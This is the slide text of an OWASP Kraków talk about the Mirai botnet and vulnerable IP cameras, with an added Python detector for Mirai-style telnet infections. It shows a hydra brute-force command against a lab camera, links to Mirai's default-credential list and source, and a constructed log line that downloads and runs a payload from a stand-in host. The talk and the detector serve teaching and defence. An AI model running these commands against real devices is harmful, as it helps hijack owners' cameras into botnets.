Mirai intro to discussion, OWASP Kraków 2016.11.15
@slawekja
We have all heard about it...
The manufacturer most often pointed to
No, it’s not us, it’s the users!
http://www.xiongmaitech.com/index.php/news/info/12/76
(Chinese only; I used Google Translate)
My story...
• The best-priced IP camera with PoE and ONVIF
• A management standard that (was supposed to) assure painless integration of the video into my installation.
Malware embedded...
http://artfulhacker.com/post/142519805054/beware-even-things-on-amazon-come
https://ipcamtalk.com/threads/brenz-pl-malware-in-ip-cameras-what-now.12851/
http://forums.whirlpool.net.au/forum-replies.cfm?t=2362073&p=11&#r211
Path traversal
Auth bypass...
„CLOUD SERVICE”
The „cloud” service
# tcpdump host camera.local
18:48:41.290938 IP camera.local.49030 > ec2-54-72-86-70.eu-west-1.compute.amazonaws.com.8000: UDP, length 25
Device login – no pass, static captcha, id=MAC ;)
FAQ
TELNET
Nmap
root@kali:~# nmap 10.5.5.20
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-11-06 10:59 EST
Nmap scan report for 10.5.5.20
Host is up (0.019s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
554/tcp open rtsp
8899/tcp open ospf-lite
Mirai credentials for brute-force
https://github.com/securing/mirai_credentials
Now go and brute the telnet
• root@kali:~# hydra -C mirai_creds.txt telnet://10.5.5.20
A few seconds later...
The telnet password
• I did not have the credentials a few years ago...
• But the password was already known then. No need to hack: search for „password” and the name of the device in Russian.
Wait...
• But we have changed the default password, didn’t we?
https://www.us-cert.gov/ncas/alerts/TA16-288A
So, where is the password?
# cat /etc/passwd
root:$1$RYIwEiRA$d5iRRVQ5ZeRTrJwGjRy.B0:0:0:root:/:/bin/sh
# mount
/dev/root on / type cramfs (ro,relatime)
Can we change it?
# passwd
-sh: passwd: not found
# echo "better etc passwd" > /etc/passwd
-sh: can't create /etc/passwd: Read-only file system
# mount -o remount,rw /
# mount
/dev/root on / type cramfs (ro,relatime)
So, it looks like we have to reflash...
• The DVR (10.5.5.30) has telnet disabled in firmware versions from mid-2015 onwards.
• But for many models the upgrade is not available ;)
• ... and the DVR still has telnet on 9527 ;) not to mention other vulns
HOW TO UPGRADE FIRMWARE?
Let’s imagine you are a regular camera user...
• You have bought a camera in the nearest shop that sells cameras.
• You know your camera is vulnerable and should be upgraded.
• Try to find out how to do it, and where to find the firmware.
What do you think a regular user will do?
DEVICE SUPPLY CHAIN
Various vendors – same device
Supply chain (fabless manufacturing)
• Board Support Package: drivers, bootloader, kernel-level SDK (Broadcom, Texas Instruments, HiSilicon, WindRiver...)
• Original Device Manufacturer: web interface, SDK, cloud... (usually an unknown company from China, Taiwan etc.)
• Original Equipment Manufacturer: composing and branding ODMs, plus support, license, warranty...
• Value Added Reseller / Distributor
• End user
What drives each hand-off down the chain: Features, Price! (at every step)
Security? A question mark at every step.
MIRAI
Back in 2012
Internet Census Project
http://internetcensus2012.bitbucket.org/paper.html
2012 vs 2016
https://www.malwaretech.com/2016/10/mapping-mirai-a-botnet-case-study.html
http://internetcensus2012.bitbucket.org/paper.html
Mirai source
https://github.com/jgamblin/Mirai-Source-Code/
Warning:
• The zip file for this repo is being identified by some AV programs as malware.
Worth reading
• The original post that came with the source code: Mirai-Source-Code-master/ForumPost.txt
How does it spread?
• mirai/bot/scanner.c
Scans for random IPs with several exclusions ;)
Next, it tries to hit telnet
• And one time in ten, also on 2323
Password list
Resolve C&C IP with DNS
CATCHING MIRAI
https://twitter.com/MiraiAttacks/
• Live feed of commands sent to 500 „infected” machines
How about dynamic analysis?
We will expose the camera’s telnet service directly to the Internet... and see what happens.
https://asciinema.org/a/1tynlhzfs0lmw6t3bn5k40cu7
Our setup
Devices: 2 cameras + 1 DVR
Router VPNs to a public IP and exposes the devices’ telnet
Dump all traffic to/from the devices for analysis
Wireshark analysis
http://10.5.5.5/mirai.pcap
• Right click -> Follow -> TCP Stream
Telnet session
„Hello, my name is ...”
Check processor version
Download payload into „upnp”
C&C connection establishment – DNS query
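As an added example (not code from the talk), here is a small Python detector that encodes what the captured session shows, end to end: a source fanning out over many hosts on 23/2323 the way the scanner does, and a telnet transcript with a default-credential login, a processor check, a download into a file named "upnp" and then a DNS query for the C&C host. Every log line, address, host name and credential is constructed; the patterns and thresholds are my assumptions, not anything from the Mirai source.

```python
"""Flag Mirai-style telnet activity in constructed logs.

Added example, not code from the talk. It encodes two behaviours the slides
describe: the scanner knocking on telnet (port 23, one attempt in ten on 2323)
and the infection chain seen in the Wireshark TCP stream of the exposed camera
(login, processor check, payload download into "upnp", DNS query for the C&C).
All log lines, addresses and credentials are constructed; the patterns and
thresholds are assumptions.
"""
import re
from collections import defaultdict

# Constructed stand-in for the public default-credential list the talk links to.
DEFAULT_PASSWORDS = {"admin", "1234", "default", "password"}

# Constructed connection log: "src dst dport" per attempted TCP connection.
# One source fans out over nine hosts on 23 and one on 2323, like the scanner.
CONN_LOG = """\
192.0.2.10 203.0.113.1 23
192.0.2.10 203.0.113.2 23
192.0.2.10 203.0.113.3 23
192.0.2.10 203.0.113.4 23
192.0.2.10 203.0.113.5 23
192.0.2.10 203.0.113.6 23
192.0.2.10 203.0.113.7 23
192.0.2.10 203.0.113.8 23
192.0.2.10 203.0.113.9 23
192.0.2.10 203.0.113.10 2323
192.0.2.77 203.0.113.50 80
192.0.2.77 203.0.113.51 443
"""

# Constructed transcript of one telnet session (what Follow -> TCP Stream
# shows), followed by the DNS query the device made right after.
SESSION_LOG = """\
login: root
password: 1234
cmd: enable
cmd: cat /proc/cpuinfo
cmd: cd /tmp; wget http://198.51.100.7/arm7 -O upnp; ./upnp
dns: A? cnc.example.invalid
"""

TELNET_PORTS = {"23", "2323"}


def telnet_scanners(conn_log, min_targets=8):
    """Return {src: distinct telnet targets} for every source that touched at
    least min_targets distinct hosts on 23/2323 (the scanner's fan-out)."""
    targets = defaultdict(set)
    for line in conn_log.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        src, dst, dport = parts
        if dport in TELNET_PORTS:
            targets[src].add(dst)
    return {src: len(t) for src, t in targets.items() if len(t) >= min_targets}


# One pattern per stage of the chain, in the order the talk observed them.
STAGES = {
    "default_credential_login": re.compile(r"^password:\s*(\S+)"),
    "processor_check": re.compile(r"/proc/cpuinfo"),
    "payload_download_upnp": re.compile(r"\b(wget|tftp|ftpget|curl)\b.*\bupnp\b"),
    "cnc_dns_lookup": re.compile(r"^dns:\s*A\?\s*(\S+)"),
}


def infection_stages(session_log):
    """Return the chain stages present in a transcript, in the order seen."""
    seen = []
    for line in session_log.splitlines():
        for name, rx in STAGES.items():
            m = rx.search(line)
            if not m:
                continue
            # A password prompt only counts when the value is a known default.
            if name == "default_credential_login" and m.group(1) not in DEFAULT_PASSWORDS:
                continue
            if name not in seen:
                seen.append(name)
    return seen


def verdict(session_log, min_stages=3):
    """'mirai_like' when at least min_stages stages appear, in chain order."""
    seen = infection_stages(session_log)
    in_chain_order = [s for s in STAGES if s in seen]
    return "mirai_like" if seen == in_chain_order and len(seen) >= min_stages else "clean"


if __name__ == "__main__":
    print(telnet_scanners(CONN_LOG))      # {'192.0.2.10': 10}
    print(infection_stages(SESSION_LOG))  # all four stages, in order
    print(verdict(SESSION_LOG))           # mirai_like
```

On a real capture the same two checks would be fed from a flow log and from the reassembled TCP stream rather than from the constructed strings above.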
C&C DNS
Thanks: Josh Pyorre, OpenDNS
DNS – domain taken by FBI
Thanks: Josh Pyorre, OpenDNS
whois hightechcrime.club
Registrant ID: C4853993-CLUB
Registrant Name: Zee Gate
Registrant Street: 666 antichrist lane
Registrant City: San Diego
Registrant State/Province: CA
Registrant Postal Code: 92050
Registrant Country: US
Registrant Phone: +1.7603014069
Registrant Fax: +1.7603014069
Registrant Email: abuse@fbi.gov
Admin ID: C4853996-CLUB
Admin Name: Zee Gate
Admin Street: 666 antichrist lane
CNC
Scanning for new targets
Other variants – DONGS ?
WHAT CAN WE DO?
Set your DNS to 127.0.0.1?
Not everyone can afford that ;)
Features at low cost, compromising on security, is just obscene ;) Let’s do it better!